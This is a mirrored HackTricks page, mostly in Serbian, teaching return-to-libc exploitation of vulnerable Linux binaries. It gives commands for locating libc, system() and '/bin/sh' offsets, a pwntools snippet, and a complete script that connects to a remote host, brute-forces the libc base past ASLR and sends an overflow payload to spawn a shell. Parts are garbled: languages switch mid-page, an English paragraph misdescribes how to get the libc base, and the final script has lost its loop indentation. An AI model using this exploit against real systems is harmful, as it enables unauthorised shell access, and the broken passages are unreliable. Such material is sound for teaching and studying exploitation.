Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-24 21:53:54 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/exploiting/linux-exploiting-basic-esp/ret2lib.md
Translator workflow 6c06826974 Translated to Serbian
2024-02-10 13:11:20 +00:00

5.8 KiB
Raw Permalink Blame History

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Ako ste pronašli ranjivu binarnu datoteku i mislite da je možete iskoristiti pomoću Ret2Lib, ovde možete pronaći neke osnovne korake koje možete pratiti.

Ako ste unutar hosta

Možete pronaći adresu libc

ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time)

Ako želite da proverite da li ASLR menja adresu libc-a, možete uraditi sledeće:

for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done

Dobijanje ofseta funkcije system

To get the offset of the system function, we can use the objdump command to analyze the binary file. The system function is usually located in the libc library, so we need to find the address of the system function in libc.

First, we need to identify the libc library used by the target binary. We can do this by running the ldd command followed by the path to the binary. This will display the shared libraries used by the binary, including the libc library.

Once we have identified the libc library, we can use the objdump command to analyze the library file. We need to find the address of the system function within the libc library. We can search for the system function using the grep command and the pattern \<system\>. This will give us the address of the system function.

With the address of the system function, we can calculate the offset by subtracting the base address of the libc library. The base address can be obtained by running the ldd command followed by the path to the libc library and looking for the "base address" line.

By subtracting the base address from the address of the system function, we can obtain the offset. This offset can be used in various exploitation techniques, such as return-to-libc attacks.

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system

Dobijanje ofseta "/bin/sh"

Da biste dobili ofset "/bin/sh" u ciljnom programu, možete koristiti alat kao što je pwntools ili ROPgadget. Ovi alati vam omogućavaju da pronađete ofsete određenih stringova u bibliotekama koje su učitane u ciljni program.

Evo primera koda koji koristi pwntools biblioteku za dobijanje ofseta "/bin/sh":

from pwn import *

elf = ELF('target_binary')
bin_sh_offset = next(elf.search(b'/bin/sh'))

print(f'Offset of "/bin/sh": {hex(bin_sh_offset)}')

Nakon izvršavanja ovog koda, dobićete ofset "/bin/sh" u heksadecimalnom formatu.

strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh

/proc/<PID>/maps

Ako proces svaki put kada komunicirate s njim (mrežni server) stvara djecu, pokušajte pročitati tu datoteku (vjerojatno će vam trebati root pristup).

Ovdje možete pronaći točno gdje je učitan libc unutar procesa i gdje će biti učitan za svako dijete procesa.

U ovom slučaju je učitan na adresi 0xb75dc000 (Ovo će biti bazna adresa libc-a)

Korištenje gdb-peda

Dobijte adresu funkcije system, funkcije exit i stringa "/bin/sh" koristeći gdb-peda:

p system
p exit
find "/bin/sh"

Zaobilazak ASLR-a

Možete pokušati da brute force-ujete baznu adresu libc-a.

for off in range(0xb7000000, 0xb8000000, 0x1000):

Kod

from pwn import *

c = remote('192.168.85.181',20002)
c.recvline()    #Banner

for off in range(0xb7000000, 0xb8000000, 0x1000):
p = ""
p += p32(off + 0x0003cb20) #system
p += "CCCC" #GARBAGE
p += p32(off + 0x001388da) #/bin/sh
payload = 'A'*0x20010 + p
c.send(payload)
c.interactive() #?
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u: